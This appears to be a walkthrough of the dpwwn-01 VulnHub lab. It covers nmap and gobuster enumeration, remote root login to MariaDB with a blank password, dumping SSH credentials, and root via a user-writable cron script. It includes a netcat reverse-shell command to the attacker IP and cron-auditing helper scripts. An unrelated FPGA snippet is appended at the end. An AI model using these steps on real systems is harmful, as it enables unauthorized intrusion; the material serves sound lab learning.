
dpwwn-01 VulnHub box notes

Date: 2024-08-10 17:27:46  Views: 14
Tags: 01 http 192.168 dpwwn 84.129 ssh mysql box open


Overview

This is a VulnHub box. Its lesson is less about the web side and more about what to do when the web side offers no way in: how to choose between brute-forcing MySQL and SSH, and when trying default accounts and weak passwords first is the cheaper move.

A download link is provided here; you can also fetch the image from VulnHub.

dpwwn-01: https://pan.baidu.com/s/1P5Peude95xYcsUsKd0_55w?pwd=8v4h
Extraction code: 8v4h

1. Nmap scanning

1) Host discovery

# -sn: ping scan only, no port scan
sudo nmap -sn 192.168.84.1/24

The target's IP address is 192.168.84.129:

MAC Address: 00:50:56:FA:CB:D3 (VMware)                                                                
Nmap scan report for 192.168.84.129                        
Host is up (0.00072s latency).  

2) Port scan

-sT: full TCP connect scan; --min-rate 10000: send at least 10000 packets per second; -p-: all 65535 ports; -o ports: write the results to the file ports (the documented form of the flag is -oN ports)

sudo nmap -sT --min-rate 10000 -p- 192.168.84.129 -o ports     
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:43 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:33:4A:85 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

Extract the ports

cat prints the file, grep keeps the lines containing "open", awk -F '/' splits on "/" and prints the first field (the port number), paste -s joins all lines into one and -d sets the separator

cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','

Result: 22,80,3306

Store it in the variable ports:

ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
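The one-liner above keys on the word "open" anywhere in a line, so a service name that happens to contain "open", or a UDP port reported as open|filtered, would slip into the list. The function below is an added example, not from the original post: it filters on nmap's STATE column instead, strips the /tcp or /udp suffix, and is exercised against a constructed -oN file. The 8080/tcp filtered and 161/udp open|filtered lines in that file are invented for the demo and were not in the real scan.

```shell
#!/bin/sh
# Added example: turn nmap normal output (-oN) into the comma list that -p expects.
# Only ports whose STATE column is exactly "open" are kept; "open|filtered",
# "filtered" and "closed" are dropped, and the protocol suffix is removed.

open_ports_csv() {
  # $1: path to an nmap -oN output file
  awk '$2 == "open" && $1 ~ /^[0-9]+\/(tcp|udp)$/ { sub(/\/.*/, "", $1); print $1 }' "$1" \
    | sort -n -u | paste -sd ','
}

# Constructed sample modelled on the dpwwn-01 scan, with two extra lines that
# the naive "grep open" pipeline would mishandle.
demo_open_ports() {
  tmp=$(mktemp)
  cat > "$tmp" <<'EOF'
# Nmap 7.93 scan initiated as: nmap -sT --min-rate 10000 -p- -oN ports 192.168.84.129
Nmap scan report for 192.168.84.129
Host is up (0.00034s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE         SERVICE
22/tcp   open          ssh
80/tcp   open          http
3306/tcp open          mysql
8080/tcp filtered      http-proxy
161/udp  open|filtered snmp
# Nmap done
EOF
  open_ports_csv "$tmp"
  rm -f "$tmp"
}

demo_open_ports   # -> 22,80,3306
```

In real use: ports=$(open_ports_csv ports) and then nmap -p"$ports" as in the next step.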

3) Detailed scan

-sT: TCP connect scan, -sV: service/version detection, -sC: default NSE scripts, -p$ports: only the ports found above, -O: OS detection, -o details: write the output to the file details

sudo nmap -sT -sV -sC -p$ports -O 192.168.84.129 -o details

# pressing Tab after typing $ports expands the variable on the command line, giving:

sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.84.129 -o details

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:46 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00026s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c1d3be39429d5cb4952c5b2e20590e3a (RSA)
|   256 434ac610e7177da0c0c376881d43a18c (ECDSA)
|_  256 0ecce3e1f78773a10347b9e2cf1c9315 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.60-MariaDB
|   Thread ID: 6
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolNew, SupportsCompression, ODBCClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, FoundRows, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, SupportsLoadDataLocal, InteractiveClient, DontAllowDatabaseTableColumn, LongPassword, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: pT5IR={v`[(QD?NJgK~Y
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:33:4A:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds

The target exposes only three services: SSH, HTTP and MySQL. The banners (OpenSSH 7.4, Apache 2.4.6 with PHP 5.4.16, MariaDB 5.5.60) are the stock CentOS 7 versions.

4) Vulnerability script scan

nmap --script=vuln -p22,80,3306 192.168.84.129 -o vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-10 03:48 EDT
Nmap scan report for 192.168.84.129
Host is up (0.00031s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 147.72 seconds

By priority, the web service is tested first, then MySQL, then SSH. The vuln scan already gives one lead on port 80: an /info.php file.

2. Web penetration

First, visit port 80.

It is the stock Apache test page, so all that is left is directory brute-forcing:

gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.84.129
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

No directories found, so try again with file extensions:

sudo gobuster dir -u http://192.168.84.129 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,tar,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.84.129
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,tar,conf
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info.php             (Status: 200) [Size: 47462]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

Only /info.php turns up (the file the vuln scan already pointed at), and it gives us nothing useful.

With directory brute-forcing exhausted, we have to choose where to go next. We have no target-specific usernames or passwords, so both SSH and MySQL would need to be brute-forced. MySQL is the better first bet. SSH would give an immediate foothold, but without a plausible username list a blind SSH brute force burns most of our time for nothing. MySQL, by contrast, has a well-known default account, root, so trying a blank password and a handful of weak ones costs one connection attempt each before any real brute force is needed. The misconfiguration that makes this work is also the real finding on this box: MariaDB is listening on the network interface and accepts remote root logins.

So MySQL is the first thing to try.

3. Gaining a foothold

Try the MySQL root account with a blank password:

mysql -uroot -h 192.168.84.129
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1535
Server version: 5.5.60-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

No password at all, and we are in.

Look for anything holding user data: show databases;

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.010 sec)

There is an ssh database. Switch to it with use ssh; and list its tables with show tables;: it contains a users table. Dump it:

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.000 sec)

A set of credentials. Save them (the $ signs are escaped so the shell leaves them alone):

echo "mistic:testP@\$\$swordmistic" > creds


Connect over SSH (no sudo needed; ssh runs as an ordinary user):

ssh mistic@192.168.84.129

Foothold obtained.

4. Privilege escalation to root

In mistic's home directory there is a script, logrot.sh.

Look at it:

[mistic@dpwwn-01 ~]$ cat logrot.sh 
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "$line" >> $LOGFILE
done

Given the script, the first thing to check is whether a cron job runs it, and as whom:

[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/3 *  * * *  root  /home/mistic/logrot.sh

There is indeed such a job: root runs /home/mistic/logrot.sh every 3 minutes. The script sits in mistic's home directory, so check with ls -l logrot.sh that mistic can write it; if so, anything we put in the file executes as root. Overwrite it with a reverse shell pointing back at the attacking machine (192.168.84.128 here; on CentOS 7 nc is nmap-ncat, which supports -e):

echo "nc -e /bin/bash 192.168.84.128 4444" > logrot.sh

The shebang line is gone, but cron's SHELL is /bin/bash and bash runs a shebang-less executable file as a script, and truncating with > keeps the file's execute bit.

Listen locally on port 4444 and wait for the next 3-minute cron tick:

nc -lvp 4444
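The manual check above (find a cron job that runs as root, then verify that its script is writable by us) is worth automating so it is not missed on the next box. The script below is an added example, not part of the original post or of the box: it parses crontab lines in the /etc/crontab six-field format (including @reboot-style entries) and reports every job whose executable the current user can write to, or whose directory is writable so the file could be replaced or created. The demo crontab and the temp-directory stand-in for /home/mistic/logrot.sh are constructed for the example.

```shell
#!/bin/sh
# Added example: enumerate cron jobs whose target we can tamper with.
# Input: a system crontab (the format with a user column, as in /etc/crontab
# and /etc/cron.d/*). Output: "<user> <path> file-writable|dir-writable" for
# each job whose command we can modify or replace. A root job pointing at a
# user-writable script, like /home/mistic/logrot.sh on dpwwn-01, is what this
# flags.

find_writable_cron_targets() {
  crontab_file=$1
  set -f  # disable globbing so '*' fields stay literal during word splitting
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in
      ''|\#*) continue ;;        # blank line or comment
      [A-Za-z_]*) continue ;;    # SHELL=/bin/bash style variable assignment
    esac
    set -- $line
    case "$1" in
      @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;  # @reboot user cmd
      *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;  # m h dom mon dow user cmd
    esac
    target=$1                    # first word of the command
    case "$target" in
      /*) ;;                     # only absolute paths can be checked
      *) continue ;;
    esac
    dir=${target%/*}; [ -n "$dir" ] || dir=/
    if [ -e "$target" ] && [ -w "$target" ]; then
      printf '%s %s file-writable\n' "$user" "$target"
    elif [ -d "$dir" ] && [ -w "$dir" ]; then
      # missing or read-only file in a directory we can write: replaceable
      printf '%s %s dir-writable\n' "$user" "$target"
    fi
  done < "$crontab_file"
  set +f
}

# Constructed demo (not the real /etc/crontab): a writable script in a temp
# directory plays the role of /home/mistic/logrot.sh; the other two jobs show
# a missing file in a writable directory and a path we cannot touch at all.
demo_cron_check() {
  tmp=$(mktemp -d)
  : > "$tmp/logrot.sh"
  cat > "$tmp/crontab" <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# For details see man 4 crontabs
*/3 *  * * *  root  $tmp/logrot.sh
@reboot       root  $tmp/missing.sh --flag
0 3 * * *     root  /nonexistent_dir_for_demo/rotate.sh
EOF
  find_writable_cron_targets "$tmp/crontab"
  rm -rf "$tmp"
}

demo_cron_check
```

On a real target run it as find_writable_cron_targets /etc/crontab and over each file in /etc/cron.d; user crontabs in /var/spool/cron use a five-field format without the user column and are not covered by this parser.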

Root shell obtained.

Grab the flag (shown as a screenshot in the original post).

I know this was a very simple challenge, but congratulations all the same.

Summary

  1. The nmap scan showed the target running SSH, HTTP and MySQL.
  2. Directory brute-forcing of the web site came up empty.
  3. That left the choice between brute-forcing SSH and MySQL, with no solid information from which to build a targeted wordlist.
  4. Because MySQL has the default root account, we tried weak passwords there, logged in with a blank password, and found SSH credentials in a database.
  5. Those credentials gave a foothold over SSH, and in mistic's home directory we found logrot.sh, a script run by cron.
  6. Root's cron job executed that user-writable script, so overwriting it gave a root reverse shell and the box was done.

From: https://www.cnblogs.com/LING5/p/18352552

    软件版本:Anlogic-TD5.9.1-DR1_ES1.1操作系统:WIN1064bit硬件平台:适用安路(Anlogic)FPGA实验平台:米联客-MLK-L1-CZ06-DR1M90G开发板板卡获取平台:https://milianke.tmall.com/登录"米联客"FPGA社区http://www.uisrc.com视频课程、答疑解惑! ​1概述本文介绍了基于XILIN......